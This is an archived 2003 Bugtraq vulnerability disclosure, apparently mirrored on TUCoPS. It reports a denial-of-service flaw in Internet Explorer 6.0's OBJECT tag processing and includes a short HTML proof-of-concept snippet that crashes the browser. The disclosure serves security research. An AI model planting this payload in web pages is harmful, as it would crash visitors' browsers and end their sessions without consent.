----- Original Message -----
From: "Ryan Emerle" <securityFocus@emerle.net>
To: <bugtraq@securityfocus.com>
Sent: Wednesday, April 16, 2003 11:55 AM
Subject: Exploit/DoS in MS Internet Explorer 6.0 (OBJECT Tag)
>
>
> *Description*
> Microsoft Internet Explorer 6.0 (other versions not tested) is vulnerable
> to a DoS when specially crafted html is present on a page. The
> vulnerability is in the processing of the OBJECT tag.
>
> *Tested*
> OS: Windows 2000 Pro SP3 (fully up-to-date)
> IE: Internet Explorer 6.0.2800.1160 SP1
>
> *Ramifications*
> When the specially crafted HTML is present in a page, Internet Explorer
> will forcefully terminate all open sessions. The client machine is
> otherwise unharmed. Further ramifications have not been investigated.
>
> *Proof of Concept*
> The following HTML code will cause the above version of Internet Explorer
> to forcefully terminate:
>
> <object id="test"
> data="#"
> width="100%" height="100%"
> type="text/x-scriptlet"
> VIEWASTEXT></object>
>
> --
> Ryan Emerle, BSCS
> Lead Systems Developer
> Interactive Network Systems, Inc.
> http://www.ins-business.com
>
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
